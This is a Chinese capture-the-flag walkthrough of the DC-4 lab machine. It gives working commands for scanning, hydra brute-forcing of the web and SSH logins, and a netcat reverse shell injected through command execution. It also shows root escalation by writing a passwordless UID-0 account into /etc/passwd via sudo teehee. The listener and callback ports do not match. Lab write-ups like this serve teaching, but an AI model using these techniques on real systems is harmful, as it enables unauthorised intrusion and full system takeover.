一、准备工作

1.靶机下载链接

链接: 百度网盘 请输入提取码 提取码: 3hq4

2.用ifconfig查看kali的ip

二、信息收集

1.nmap的信息收集

（1）主机发现

命令：nmap 192.168.101.0/24

（2）扫描靶机详细信息

发现主机 192.168.101.117，判定为DC-4靶机，继续使用nmap命令获取靶机开放端口及其协议

命令：nmap -A 192.168.101.117

该靶机开放80和22端口，访问一下它的网页：http://192.168.101.117/

由上图可知，需要admin用户登录

（3）hydra爆破

1.解压rockyou.txt.gz文件

命令：gzip -d rockyou.txt.gz（在root权限下）

2.爆破密码

命令：hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.101.117 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

3.使用爆破出来的密码登录，发现命令可以执行

4.尝试抓包

5. 修改命令，查看login.php

6. 使用nc命令进行反弹

kali开启监听：nc -lvvp 4444

radio后面添加的命令：nc 192.168.101.10 1234 -e /bin/bash

7.优化命令执行终端

执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

8.利用发现的字典爆破jim用户的密码

（1）在jim目录下面发现一个字典的备份

（2）查看其他两个文件

（3）把刚才找到的字典复制出来

命令：leafpad dc-4

（4）尝试ssh爆破，使用hydra工具爆破

命令： hydra -l jim -P dc-4 ssh://192.168.101.117

9.ssh远程登录jim用户

（6）查看jim用户文件

1.查看/var/jim，内容如下

2.发现用户charles的密码，尝试登录，结果登录成功

3.查看用户权限发现，该用户可以以root权限免密码执行 /usr/bin/teehee

命令：sudo -l

三、提权

1.直接向/etc/passwd中增加内容

（1） 添加一个 hack用户,并使用teehee执行写入 passwd中

命令： echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

（2）无密码登录root

命令：su admin

2.拿下flag

进入到/root目录下发现flag.txt文件

命令：1.cd /root；2.ls；3.cat flag.txt